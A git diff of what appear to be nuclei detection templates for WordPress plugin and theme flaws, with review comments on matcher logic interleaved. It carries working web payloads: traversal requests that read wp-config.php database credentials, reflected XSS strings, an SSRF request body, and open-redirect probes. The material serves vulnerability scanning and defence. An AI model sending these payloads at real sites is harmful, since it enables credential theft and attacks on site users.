@@ -2,16 +2,17 @@ id: wp-grimag-open-redirect info: name: WordPress Grimag Themes < 1.1.1 Open Redirection author: 0x_Akoko - description: The Grimag WordPress theme was affected by an Open Redirection security vulnerability. - reference: https://wpscan.com/vulnerability/db319d4c-7de6-4d36-90e9-86de82e9c03a severity: low + description: The Grimag WordPress theme was affected by an Open Redirection security vulnerability. + reference: + - https://wpscan.com/vulnerability/db319d4c-7de6-4d36-90e9-86de82e9c03a tags: wordpress,wp-theme,redirect requests: - method: GET path: - - "{{BaseURL}}/wp-content/themes/Grimag/go.php?https://example.com" + - "{{BaseURL}}/wp-content/themes/Grimag/go.php?https://interact.sh" matchers: - type: regex regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$' + - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$' part: header diff --git a/poc/wordpress/wp-grimag-open-redirect-11462.yaml b/poc/wordpress/wp-grimag-open-redirect-11462.yaml index b8089bf787..20ac245e37 100644 --- a/poc/wordpress/wp-grimag-open-redirect-11462.yaml +++ b/poc/wordpress/wp-grimag-open-redirect-11462.yaml 
@@ -1,20 +1,30 @@ id: wp-grimag-open-redirect info: - name: WordPress Grimag Themes < 1.1.1 Open Redirection + name: WordPress Grimag <1.1.1 - Open Redirection author: 0x_Akoko - description: The Grimag WordPress theme was affected by an Open Redirection security vulnerability. - reference: https://wpscan.com/vulnerability/db319d4c-7de6-4d36-90e9-86de82e9c03a - severity: low - tags: wordpress,wp-theme,redirect + severity: medium + description: WordPress Grimag theme before 1.1.1 contains an open redirect vulnerability. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations. + remediation: Fixed in 1.1.1. + reference: + - https://wpscan.com/vulnerability/db319d4c-7de6-4d36-90e9-86de82e9c03a + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cwe-id: CWE-601 + metadata: + max-request: 1 + tags: wp-theme,redirect,wpscan,wordpress -requests: +http: - method: GET path: - - "{{BaseURL}}/wp-content/themes/Grimag/go.php?https://example.com" + - "{{BaseURL}}/wp-content/themes/Grimag/go.php?https://interact.sh" matchers: - type: regex regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$' + - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$' part: header + +# digest: 4a0a00473045022100d40ec63c134265020e2c32431122360fc45c7638ad3697c5ce3f42982b1cd01b02207e07120720fc907481b2c0530ce58a1079e47bc99d77fb5c35a578ccc5bce04b:922c64590222798bb761d5b6d8e72950 diff --git a/poc/wordpress/wp-gtranslate-open-redirect.yaml b/poc/wordpress/wp-gtranslate-open-redirect-11463.yaml similarity index 100% rename from poc/wordpress/wp-gtranslate-open-redirect.yaml rename to poc/wordpress/wp-gtranslate-open-redirect-11463.yaml 
diff --git a/poc/wordpress/wp-gtranslate-open-redirect-11465.yaml b/poc/wordpress/wp-gtranslate-open-redirect-11465.yaml deleted file mode 100644 index 2d9331f914..0000000000 --- a/poc/wordpress/wp-gtranslate-open-redirect-11465.yaml +++ /dev/null @@ -1,22 +0,0 @@ -id: wp-gtranslate-open-redirect -info: - name: GTranslate < 2.8.11 - Unauthenticated Open Redirect - author: dhiyaneshDK - severity: medium - description: The Translate WordPress with GTranslate WordPress plugin was affected by an Unauthenticated Open Redirect security vulnerability. - reference: - - https://www.pluginvulnerabilities.com/2017/02/17/open-redirect-vulnerability-in-gtranslate/ - tags: redirect,wordpress -requests: - - method: GET - path: - - '{{BaseURL}}/wp-content/plugins/gtranslate/url_addon/gtranslate.php?glang=en&gurl=/www.pluginvulnerabilities.com' - matchers-condition: and - matchers: - - type: word - words: - - "Location: www.pluginvulnerabilities.com" - part: header - - type: status - status: - - 301 diff --git a/poc/wordpress/wp-haberadam-idor.yaml b/poc/wordpress/wp-haberadam-idor.yaml index c933e6ab2a..7832b14743 100644 --- a/poc/wordpress/wp-haberadam-idor.yaml +++ b/poc/wordpress/wp-haberadam-idor.yaml @@ -1,18 +1,24 @@ id: wp-haberadam-idor + info: - name: WordPress Themes Haberadam IDOR and Full Path Disclosure via JSON API + name: WordPress Themes Haberadam JSON API - IDOR and Path Disclosure author: pussycat0x severity: low - reference: https://cxsecurity.com/issue/WLB-2021090078 + reference: + - https://cxsecurity.com/issue/WLB-2021090078 metadata: - google-dork: inurl:/wp-content/themes/haberadam/ + max-request: 2 + google-query: inurl:/wp-content/themes/haberadam/ tags: wordpress,idor,wp-theme,disclosure -requests: + +http: - method: GET path: - '{{BaseURL}}/wp-content/themes/haberadam/api/mobile-info.php?id=' - '{{BaseURL}}/blog/wp-content/themes/haberadam/api/mobile-info.php?id=' + stop-at-first-match: true + matchers-condition: and matchers: - type: word 
@@ -23,10 +29,14 @@ requests: - '"degree"' - '"icon"' condition: and + - type: status status: - 200 + - type: word part: header words: - text/html + +# digest: 4a0a00473045022100d9e8e93b959b19bfd97ed5cd26aa422c7c43479e377c47e585b21cc373d67569022047b39f6bc5f1102233c9c860ebfbd32cd7c23818903195ffbbda038a7e0ef149:922c64590222798bb761d5b6d8e72950 diff --git a/poc/wordpress/wp-install-11475.yaml b/poc/wordpress/wp-install-11473.yaml similarity index 100% rename from poc/wordpress/wp-install-11475.yaml rename to poc/wordpress/wp-install-11473.yaml diff --git a/poc/wordpress/wp-install.yaml b/poc/wordpress/wp-install.yaml new file mode 100644 index 0000000000..e34f2e2637 --- /dev/null +++ b/poc/wordpress/wp-install.yaml @@ -0,0 +1,22 @@ +id: wp-install +info: + name: WordPress Exposed Installation + author: princechaddha + severity: high + reference: + - https://smaranchand.com.np/2020/04/misconfigured-wordpress-takeover-to-remote-code-execution/ + tags: wordpress +requests: + - method: GET + path: + - "{{BaseURL}}/wp-admin/install.php" + matchers-condition: and + matchers: + - type: word + words: + - "<title>WordPress › Installation" + - "Site Title" + condition: and + - type: status + status: + - 200 diff --git a/poc/wordpress/wp-iwp-client-listing-11478.yaml b/poc/wordpress/wp-iwp-client-listing-11478.yaml index 09a4b058bf..1927665ec5 100644 --- a/poc/wordpress/wp-iwp-client-listing-11478.yaml +++ b/poc/wordpress/wp-iwp-client-listing-11478.yaml 
@@ -1,21 +1,16 @@ id: wp-iwp-client-listing - info: name: WordPress Plugin Iwp-client Listing author: pussycat0x severity: info - description: Searches for sensitive directories present in the iwp-client plugin. + description: Searches for sensitive directories present in the wordpress-plugins plugin. reference: - https://www.exploit-db.com/ghdb/6427 - metadata: - max-request: 1 - tags: wordpress,listing,plugin,edb - -http: + tags: wordpress,listing,plugin +requests: - method: GET path: - "{{BaseURL}}/wp-content/plugins/iwp-client/" - matchers-condition: and matchers: - type: word @@ -23,9 +18,6 @@ http: - "Index of" - "wp-content/plugins/iwp-client/" condition: and - - type: status status: - 200 - -# digest: 490a0046304402204561cb16c2d173488139989f893bcd8f50ac7877d77360bd7f9026cfdb96b5db022048fb10551ef70047c675a60f84e33481f13cbeca9f25a75285c49cdf0f51f4ea:922c64590222798bb761d5b6d8e72950 diff --git a/poc/wordpress/wp-iwp-client-listing-11479.yaml b/poc/wordpress/wp-iwp-client-listing-11479.yaml index 8968c15c52..09a4b058bf 100644 --- a/poc/wordpress/wp-iwp-client-listing-11479.yaml +++ b/poc/wordpress/wp-iwp-client-listing-11479.yaml @@ -1,15 +1,21 @@ id: wp-iwp-client-listing + info: name: WordPress Plugin Iwp-client Listing author: pussycat0x severity: info - description: Searches for sensitive directories present in the wordpress-plugins plugin. - reference: https://www.exploit-db.com/ghdb/6427 - tags: wordpress,listing,plugin -requests: + description: Searches for sensitive directories present in the iwp-client plugin. + reference: + - https://www.exploit-db.com/ghdb/6427 + metadata: + max-request: 1 + tags: wordpress,listing,plugin,edb + +http: - method: GET path: - "{{BaseURL}}/wp-content/plugins/iwp-client/" + matchers-condition: and matchers: - type: word 
@@ -17,6 +23,9 @@ requests: - "Index of" - "wp-content/plugins/iwp-client/" condition: and + - type: status status: - 200 + +# digest: 490a0046304402204561cb16c2d173488139989f893bcd8f50ac7877d77360bd7f9026cfdb96b5db022048fb10551ef70047c675a60f84e33481f13cbeca9f25a75285c49cdf0f51f4ea:922c64590222798bb761d5b6d8e72950 diff --git a/poc/wordpress/wp-javospot-lfi-11482.yaml b/poc/wordpress/wp-javospot-lfi-11482.yaml new file mode 100644 index 0000000000..bbacef80f0 --- /dev/null +++ b/poc/wordpress/wp-javospot-lfi-11482.yaml @@ -0,0 +1,38 @@ +id: wp-javospot-lfi + +info: + name: WordPress Javo Spot Premium Theme - Local File Inclusion + author: 0x_Akoko + severity: high + description: WordPress Javo Spot Premium Theme is vulnerable to local file inclusion that allows remote unauthenticated attackers access to locally stored file and return their content. + reference: + - https://codeseekah.com/2017/02/09/javo-themes-spot-lfi-vulnerability/ + - https://wpscan.com/vulnerability/2d465fc4-d4fa-43bb-9c0d-71dcc3ee4eab + - https://themeforest.net/item/javo-spot-multi-purpose-directory-wordpress-theme/13198068 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cwe-id: CWE-22 + metadata: + max-request: 1 + tags: wordpress,wp-theme,lfi,wp,wpscan + +http: + - method: GET + path: + - '{{BaseURL}}/wp-admin/admin-ajax.php?jvfrm_spot_get_json&fn=../../wp-config.php&callback=jQuery' + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "DB_NAME" + - "DB_PASSWORD" + condition: and + + - type: status + status: + - 200 + +# digest: 4b0a00483046022100d5a26ecb5591b611b16a4a1e369d97635fc7bb9905cc8c3e153e6888118b2356022100b117f48ee2a84d8badde3cc23950232db0900a4adc39618e14e488e24a65e943:922c64590222798bb761d5b6d8e72950 diff --git a/poc/wordpress/wp-javospot-lfi.yaml b/poc/wordpress/wp-javospot-lfi.yaml deleted file mode 100644 index 6786157651..0000000000 --- a/poc/wordpress/wp-javospot-lfi.yaml +++ /dev/null 
@@ -1,26 +0,0 @@ -id: wp-javospot-lfi -info: - name: Javo Spot Premium Theme - Unauthenticated Directory Traversal - author: 0x_Akoko - severity: high - description: A vulnerability in Javo Spot Premium Theme allows remote unauthenticated attackers access to locally stored file and return their content. - reference: - - https://codeseekah.com/2017/02/09/javo-themes-spot-lfi-vulnerability/ - - https://wpscan.com/vulnerability/2d465fc4-d4fa-43bb-9c0d-71dcc3ee4eab - - https://themeforest.net/item/javo-spot-multi-purpose-directory-wordpress-theme/13198068 - tags: wordpress,wp-theme,lfi,wp -requests: - - method: GET - path: - - '{{BaseURL}}/wp-admin/admin-ajax.php?jvfrm_spot_get_json&fn=../../wp-config.php&callback=jQuery' - matchers-condition: and - matchers: - - type: word - part: body - words: - - "DB_NAME" - - "DB_PASSWORD" - condition: and - - type: status - status: - - 200 diff --git a/poc/wordpress/wp-knews-xss-11487.yaml b/poc/wordpress/wp-knews-xss-11487.yaml deleted file mode 100644 index 94f404c685..0000000000 --- a/poc/wordpress/wp-knews-xss-11487.yaml +++ /dev/null @@ -1,25 +0,0 @@ -id: wp-knews-xss -info: - name: WordPress Plugin Knews Multilingual Newsletters - Reflected Cross-Site Scripting (XSS) - author: daffainfo - severity: medium - reference: - - http://web.archive.org/web/20210213220043/https://www.securityfocus.com/bid/54330/info - tags: wordpress,xss,wp-plugin -requests: - - method: GET - path: - - '{{BaseURL}}/wp-content/plugins/knews/wysiwyg/fontpicker/?ff=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' - matchers-condition: and - matchers: - - type: word - words: - - "" - part: body - - type: word - part: header - words: - - text/html - - type: status - status: - - 200 diff --git a/poc/wordpress/wp-knews-xss-11488.yaml b/poc/wordpress/wp-knews-xss-11488.yaml new file mode 100644 index 0000000000..9b0815e576 --- /dev/null +++ b/poc/wordpress/wp-knews-xss-11488.yaml 
@@ -0,0 +1,29 @@ +id: wp-knews-xss + +info: + name: WordPress Plugin Knews Multilingual Newsletters - Reflected Cross-Site Scripting (XSS) + author: daffainfo + severity: medium + reference: https://www.securityfocus.com/bid/54330/info + tags: wordpress,xss,wp-plugin + +requests: + - method: GET + path: + - '{{BaseURL}}/wp-content/plugins/knews/wysiwyg/fontpicker/?ff=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 diff --git a/poc/wordpress/wp-mailchimp-log-exposure-11494.yaml b/poc/wordpress/wp-mailchimp-log-exposure-11494.yaml index 42ab9af2c0..1471c0f2f8 100644 --- a/poc/wordpress/wp-mailchimp-log-exposure-11494.yaml +++ b/poc/wordpress/wp-mailchimp-log-exposure-11494.yaml @@ -4,7 +4,7 @@ info: author: aashiq severity: medium description: Searches for Mailchimp log exposure by attempting to query the debug log endpoint on wp-content - tags: logs,wordpress,exposure,mailchimp + tags: logs,wordpress,exposure requests: - method: GET path: diff --git a/poc/wordpress/wp-memphis-documents-library-lfi-11495.yaml b/poc/wordpress/wp-memphis-documents-library-lfi-11495.yaml new file mode 100644 index 0000000000..ef99a48b91 --- /dev/null +++ b/poc/wordpress/wp-memphis-documents-library-lfi-11495.yaml 
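Review bot: As shown here, the body matcher in wp-knews-xss-11488.yaml is `words: - ""`, an empty string that every response contains, so the template would report any `text/html` page answering 200 on this path. If the file really holds the empty string (and this view has not simply dropped the markup), the matcher should look for the reflected value sent in `ff`, that is `- "</script><script>alert(document.domain)</script>"`. The `reference` also uses the direct securityfocus URL, whereas the deleted -11487 variant pointed at the web.archive.org copy, which may be worth keeping.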
@@ -0,0 +1,38 @@ +id: wp-memphis-documents-library-lfi + +info: + name: WordPress Memphis Document Library 3.1.5 - Local File Inclusion + author: 0x_Akoko + severity: high + description: WordPress Memphis Document Library 3.1.5 is vulnerable to local file inclusion. + reference: + - https://www.exploit-db.com/exploits/39593 + - https://wpscan.com/vulnerability/53999c06-05ca-44f1-b713-1e4d6b4a3f9f + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cwe-id: CWE-22 + metadata: + max-request: 2 + tags: wpscan,wordpress,wp-plugin,lfi,edb + +http: + - method: GET + path: + - '{{BaseURL}}/mdocs-posts/?mdocs-img-preview=../../../wp-config.php' + - '{{BaseURL}}/?mdocs-img-preview=../../../wp-config.php' + + matchers-condition: and + matchers: + - type: word + words: + - "DB_NAME" + - "DB_PASSWORD" + part: body + condition: and + + - type: status + status: + - 200 + +# digest: 4a0a004730450221008707935261327de30c608ad5ea25d1036fbc370dc12dced6f1675ad63040026202202f34a660baf89517b8e655fc539020172e721214cfbc9ae8b2447ab2ef4ff983:922c64590222798bb761d5b6d8e72950 diff --git a/poc/wordpress/wp-memphis-documents-library-lfi-11496.yaml b/poc/wordpress/wp-memphis-documents-library-lfi-11496.yaml index 844d6bf242..9cb61c8a9d 100644 --- a/poc/wordpress/wp-memphis-documents-library-lfi-11496.yaml +++ b/poc/wordpress/wp-memphis-documents-library-lfi-11496.yaml @@ -3,11 +3,11 @@ info: name: WordPress Plugin Memphis Document Library 3.1.5 LFI author: 0x_Akoko severity: high - tags: wordpress,wp-plugin,lfi description: Arbitrary file download in Memphis Document Library 3.1.5 - reference: | + reference: - https://www.exploit-db.com/exploits/39593 - https://wpscan.com/vulnerability/53999c06-05ca-44f1-b713-1e4d6b4a3f9f + tags: wordpress,wp-plugin,lfi requests: - method: GET path: diff --git a/poc/wordpress/wp-mstore-plugin-listing-11500.yaml b/poc/wordpress/wp-mstore-plugin-listing-11500.yaml new file mode 100644 index 0000000000..77a8115984 
--- /dev/null +++ b/poc/wordpress/wp-mstore-plugin-listing-11500.yaml @@ -0,0 +1,30 @@ +id: wp-mstore-plugin-listing + +info: + name: Wordpress Plugin MStore API + author: pussycat0x + severity: low + description: Searches for sensitive directories present in the mstore-api plugin. + metadata: + max-request: 1 + google-query: inurl:/wp-content/plugins/mstore-api/ + tags: wordpress,listing,wp-plugin + +http: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/mstore-api/" + + matchers-condition: and + matchers: + - type: word + words: + - "Index of" + - "/wp-content/plugins/mstore-api" + condition: and + + - type: status + status: + - 200 + +# digest: 490a0046304402201c167b12dde8a2e224c39074bad196d4138ac6424b66c782950a121b035427e9022014040370921dffe68731e76f661227a0c9515014014b0b4c9930fac8726fa0b3:922c64590222798bb761d5b6d8e72950 diff --git a/poc/wordpress/wp-multiple-theme-ssrf-11512.yaml b/poc/wordpress/wp-multiple-theme-ssrf-11512.yaml index 4fe1fb2f7a..89e2aa0442 100644 --- a/poc/wordpress/wp-multiple-theme-ssrf-11512.yaml +++ b/poc/wordpress/wp-multiple-theme-ssrf-11512.yaml @@ -1,5 +1,4 @@ id: wp-multiple-theme-ssrf - info: name: WordPress Multiple Themes - Unauthenticated Function Injection author: madrobot @@ -8,7 +7,6 @@ info: reference: - https://www.exploit-db.com/exploits/49327 - https://wpscan.com/vulnerability/10417 - requests: - raw: - | @@ -17,7 +15,6 @@ requests: Content-Type: application/x-www-form-urlencoded; charset=UTF-8 action=epsilon_framework_ajax_action&args%5Baction%5D%5B%5D=Requests&args%5Baction%5D%5B%5D=request_multiple&args%5Bargs%5D%5B0%5D%5Burl%5D=http://example.com - matchers-condition: and matchers: - type: word @@ -25,7 +22,6 @@ requests: - "Example Domain" - "protocol_version" part: body - - type: status status: - 200 diff --git a/poc/wordpress/wp-multiple-theme-ssrf-11513.yaml b/poc/wordpress/wp-multiple-theme-ssrf-11513.yaml new file mode 100644 index 0000000000..eb1b7bc7db --- /dev/null 
+++ b/poc/wordpress/wp-multiple-theme-ssrf-11513.yaml @@ -0,0 +1,27 @@ +id: wp-multiple-theme-ssrf +info: + name: WordPress Multiple Themes - Unauthenticated Function Injection + author: madrobot + severity: high + reference: + - https://www.exploit-db.com/exploits/49327 + - https://wpscan.com/vulnerability/10417 + tags: wordpress,rce,ssrf +requests: + - raw: + - | + POST /wp-admin/admin-ajax.php?action=action_name HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded; charset=UTF-8 + + action=epsilon_framework_ajax_action&args%5Baction%5D%5B%5D=Requests&args%5Baction%5D%5B%5D=request_multiple&args%5Bargs%5D%5B0%5D%5Burl%5D=http://example.com + matchers-condition: and + matchers: + - type: word + words: + - "Example Domain" + - "protocol_version" + part: body + - type: status + status: + - 200 diff --git a/poc/wordpress/wp-nextgen-xss-11516.yaml b/poc/wordpress/wp-nextgen-xss-11516.yaml index a91847e2b8..1a9dc549ba 100644 --- a/poc/wordpress/wp-nextgen-xss-11516.yaml +++ b/poc/wordpress/wp-nextgen-xss-11516.yaml @@ -4,7 +4,7 @@ info: author: daffainfo severity: medium reference: - - http://web.archive.org/web/20210123110617/https://www.securityfocus.com/bid/57200/info + - https://www.securityfocus.com/bid/57200/info tags: wordpress,xss,wp-plugin requests: - method: GET diff --git a/poc/wordpress/wp-phpfreechat-xss-11524.yaml b/poc/wordpress/wp-phpfreechat-xss-11524.yaml deleted file mode 100644 index 077f6e51e9..0000000000 --- a/poc/wordpress/wp-phpfreechat-xss-11524.yaml +++ /dev/null 
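Review bot: The word matcher in wp-multiple-theme-ssrf-11513.yaml lists `"Example Domain"` and `"protocol_version"` without a `condition`, and nuclei treats a word list as `or` by default, so a 200 response containing either string alone is reported. Add `condition: and` next to `part: body` so that both the fetched page content and the response field have to be present. The new `tags` line includes `rce`, while the matchers only confirm that the server fetched `http://example.com`; consider `tags: wordpress,ssrf` so the tag reflects what is verified.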
@@ -1,24 +0,0 @@ -id: wp-phpfreechat-xss -info: - name: WordPress Plugin PHPFreeChat - 'url' Reflected Cross-Site Scripting (XSS) - author: daffainfo - severity: medium - reference: https://www.securityfocus.com/bid/54332/info - tags: wordpress,xss,wp-plugin -requests: - - method: GET - path: - - '{{BaseURL}}/wp-content/plugins/phpfreechat/lib/csstidy-1.2/css_optimiser.php?url=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' - matchers-condition: and - matchers: - - type: word - words: - - "" - part: body - - type: word - part: header - words: - - text/html - - type: status - status: - - 200 diff --git a/poc/wordpress/wp-phpfreechat-xss-11527.yaml b/poc/wordpress/wp-phpfreechat-xss-11527.yaml index 6deb475d0b..077f6e51e9 100644 --- a/poc/wordpress/wp-phpfreechat-xss-11527.yaml +++ b/poc/wordpress/wp-phpfreechat-xss-11527.yaml @@ -1,30 +1,24 @@ id: wp-phpfreechat-xss - info: name: WordPress Plugin PHPFreeChat - 'url' Reflected Cross-Site Scripting (XSS) author: daffainfo severity: medium - reference: - - https://www.securityfocus.com/bid/54332/info + reference: https://www.securityfocus.com/bid/54332/info tags: wordpress,xss,wp-plugin - requests: - method: GET path: - '{{BaseURL}}/wp-content/plugins/phpfreechat/lib/csstidy-1.2/css_optimiser.php?url=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' - matchers-condition: and matchers: - type: word words: - "" part: body - - type: word part: header words: - text/html - - type: status status: - 200 diff --git a/poc/wordpress/wp-phpfreechat-xss-11528.yaml b/poc/wordpress/wp-phpfreechat-xss-11528.yaml index 24ca07abfb..ef3aa1dea3 100644 --- a/poc/wordpress/wp-phpfreechat-xss-11528.yaml +++ b/poc/wordpress/wp-phpfreechat-xss-11528.yaml 
@@ -4,7 +4,7 @@ info: author: daffainfo severity: medium reference: - - https://www.securityfocus.com/bid/54332/info + - http://web.archive.org/web/20210120061848/https://www.securityfocus.com/bid/54332/info tags: wordpress,xss,wp-plugin requests: - method: GET diff --git a/poc/wordpress/wp-plugin-1-flashgallery-listing-11530.yaml b/poc/wordpress/wp-plugin-1-flashgallery-listing-11530.yaml new file mode 100644 index 0000000000..91a4896fe7 --- /dev/null +++ b/poc/wordpress/wp-plugin-1-flashgallery-listing-11530.yaml @@ -0,0 +1,27 @@ +id: wp-plugin-1-flashgallery-listing + +info: + name: WordPress 1 flash gallery listing + author: pussycat0x + severity: low + description: Searches for sensitive directories present in the wordpress-plugins plugin. + reference: https://www.exploit-db.com/ghdb/6978 + tags: wordpress,listing + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/1-flash-gallery/" + - "{{BaseURL}}/blog/wp-content/plugins/1-flash-gallery/" + + matchers-condition: and + matchers: + - type: word + words: + - "Index of" + - "/wp-content/plugins/1-flash-gallery" + condition: and + + - type: status + status: + - 200 \ No newline at end of file diff --git a/poc/wordpress/wp-plugin-1-flashgallery-listing-11531.yaml b/poc/wordpress/wp-plugin-1-flashgallery-listing.yaml similarity index 100% rename from poc/wordpress/wp-plugin-1-flashgallery-listing-11531.yaml rename to poc/wordpress/wp-plugin-1-flashgallery-listing.yaml diff --git a/poc/wordpress/wp-plugin-utlimate-member-11541.yaml b/poc/wordpress/wp-plugin-utlimate-member-11541.yaml index f659152483..b29cf80ad3 100644 --- a/poc/wordpress/wp-plugin-utlimate-member-11541.yaml +++ b/poc/wordpress/wp-plugin-utlimate-member-11541.yaml 
@@ -2,11 +2,10 @@ id: wordpress-plugins-ultimate-member info: name: WordPress Plugin Ultimate Member author: pussycat0x - severity: info + severity: low description: Searches for sensitive directories present in the wordpress-plugins plugin. - reference: - - https://www.exploit-db.com/ghdb/6998 - tags: wordpress,listing,plugin + reference: https://www.exploit-db.com/ghdb/6998 + tags: wordpress,listing requests: - method: GET path: diff --git a/poc/wordpress/wp-plugin-utlimate-member.yaml b/poc/wordpress/wp-plugin-utlimate-member-11542.yaml similarity index 100% rename from poc/wordpress/wp-plugin-utlimate-member.yaml rename to poc/wordpress/wp-plugin-utlimate-member-11542.yaml diff --git a/poc/wordpress/wp-popup-listing.yaml b/poc/wordpress/wp-popup-listing-11543.yaml similarity index 100% rename from poc/wordpress/wp-popup-listing.yaml rename to poc/wordpress/wp-popup-listing-11543.yaml diff --git a/poc/wordpress/wp-popup-listing-11545.yaml b/poc/wordpress/wp-popup-listing-11545.yaml index 06a3982bd6..5ad9dd4aed 100644 --- a/poc/wordpress/wp-popup-listing-11545.yaml +++ b/poc/wordpress/wp-popup-listing-11545.yaml @@ -1,21 +1,29 @@ id: wordpress-popup-listing + info: name: WordPress Popup Plugin Directory Listing author: aashiq severity: info description: Searches for sensitive directories present in the wordpress-popup plugin. + metadata: + max-request: 1 tags: wordpress,listing,plugin -requests: + +http: - method: GET path: - "{{BaseURL}}/wp-content/plugins/wordpress-popup/views/admin/" + matchers-condition: and matchers: - type: status status: - 200 + - type: word words: - "Index of" - "/wp-content/plugins/wordpress-popup/views/admin" condition: and + +# digest: 4b0a00483046022100c2411afae73fdffc85b85ee5fbef8243d44339d64e495474f70aff573b316898022100d49b0212098b864b1b99aa662908b1a775ac28f4319ea5da7ea7294771c2bbf8:922c64590222798bb761d5b6d8e72950 
diff --git a/poc/wordpress/wp-prostore-open-redirect-11546.yaml b/poc/wordpress/wp-prostore-open-redirect-11546.yaml deleted file mode 100644 index 5d31d50aae..0000000000 --- a/poc/wordpress/wp-prostore-open-redirect-11546.yaml +++ /dev/null @@ -1,17 +0,0 @@ -id: wp-prostore-open-redirect -info: - name: WordPress ProStore Themes 1.1.2 Open Redirection - author: 0x_Akoko - description: The prostore WordPress theme was affected by an Open Redirection security vulnerability. - reference: https://wpscan.com/vulnerability/2e0f8b7f-96eb-443c-a553-550e42ec67dc - severity: low - tags: wordpress,wp-theme,redirect -requests: - - method: GET - path: - - "{{BaseURL}}/wp-content/themes/prostore/go.php?https://example.com/" - matchers: - - type: regex - regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$' - part: header diff --git a/poc/wordpress/wp-prostore-open-redirect-11549.yaml b/poc/wordpress/wp-prostore-open-redirect-11549.yaml index 9916d6c3f2..b10f1286b0 100644 --- a/poc/wordpress/wp-prostore-open-redirect-11549.yaml +++ b/poc/wordpress/wp-prostore-open-redirect-11549.yaml 
@@ -1,20 +1,18 @@ id: wp-prostore-open-redirect - info: name: WordPress ProStore Themes 1.1.2 Open Redirection author: 0x_Akoko - description: The prostore WordPress theme was affected by an Open Redirection security vulnerability. - reference: https://wpscan.com/vulnerability/2e0f8b7f-96eb-443c-a553-550e42ec67dc severity: low + description: The prostore WordPress theme was affected by an Open Redirection security vulnerability. + reference: + - https://wpscan.com/vulnerability/2e0f8b7f-96eb-443c-a553-550e42ec67dc tags: wordpress,wp-theme,redirect - requests: - method: GET path: - - "{{BaseURL}}/wp-content/themes/prostore/go.php?https://example.com/" - + - "{{BaseURL}}/wp-content/themes/prostore/go.php?https://interact.sh/" matchers: - type: regex regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$' - part: header \ No newline at end of file + - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$' + part: header diff --git a/poc/wordpress/wp-prostore-open-redirect-11550.yaml b/poc/wordpress/wp-prostore-open-redirect-11550.yaml new file mode 100644 index 0000000000..9916d6c3f2 --- /dev/null +++ b/poc/wordpress/wp-prostore-open-redirect-11550.yaml @@ -0,0 +1,20 @@ +id: wp-prostore-open-redirect + +info: + name: WordPress ProStore Themes 1.1.2 Open Redirection + author: 0x_Akoko + description: The prostore WordPress theme was affected by an Open Redirection security vulnerability. + reference: https://wpscan.com/vulnerability/2e0f8b7f-96eb-443c-a553-550e42ec67dc + severity: low + tags: wordpress,wp-theme,redirect + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/themes/prostore/go.php?https://example.com/" + + matchers: + - type: regex + regex: + - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$' + part: header \ No newline at end of file 
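Review bot: The only matcher in wp-prostore-open-redirect-11550.yaml, and in the rewritten wp-prostore-open-redirect-11549.yaml hunk before it, is a regex on the `Location` header with no check that the response is actually a redirect. A `Location` header on a non-3xx response is not followed by browsers, so pairing the regex with a status matcher under `matchers-condition: and` keeps the finding tied to a redirect a client would act on. The host part `(?:[a-zA-Z0-9\-_\.@]*)example\.com.*` also accepts any host that merely contains the test domain, which is tolerable for a canary domain but deserves a comment in the template.

```yaml
    # … unchanged: request method and path …
    matchers-condition: and
    matchers:
      # … unchanged: Location header regex matcher …
      - type: status
        status:
          - 301
          - 302
          - 307
          - 308
```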
diff --git a/poc/wordpress/wp-qards-listing-11552.yaml b/poc/wordpress/wp-qards-listing-11552.yaml deleted file mode 100644 index 0888ca8567..0000000000 --- a/poc/wordpress/wp-qards-listing-11552.yaml +++ /dev/null @@ -1,21 +0,0 @@ -id: wp-qards-listing -info: - name: WordPress Plugin Qards - author: pussycat0x - severity: info - description: Searches for sensitive directories present in the wordpress-plugins plugin. - tags: wordpress,listing,wp-plugin,wp -requests: - - method: GET - path: - - "{{BaseURL}}/wp-content/plugins/qards/" - matchers-condition: and - matchers: - - type: word - words: - - "Index of" - - "/wp-content/plugins/qards" - condition: and - - type: status - status: - - 200 diff --git a/poc/wordpress/wp-qards-listing.yaml b/poc/wordpress/wp-qards-listing.yaml new file mode 100644 index 0000000000..b9ba98785d --- /dev/null +++ b/poc/wordpress/wp-qards-listing.yaml @@ -0,0 +1,25 @@ +id: wp-qards-listing + +info: + name: WordPress Plugin Qards + author: pussycat0x + severity: info + description: Searches for sensitive directories present in the wordpress-plugins plugin. + tags: 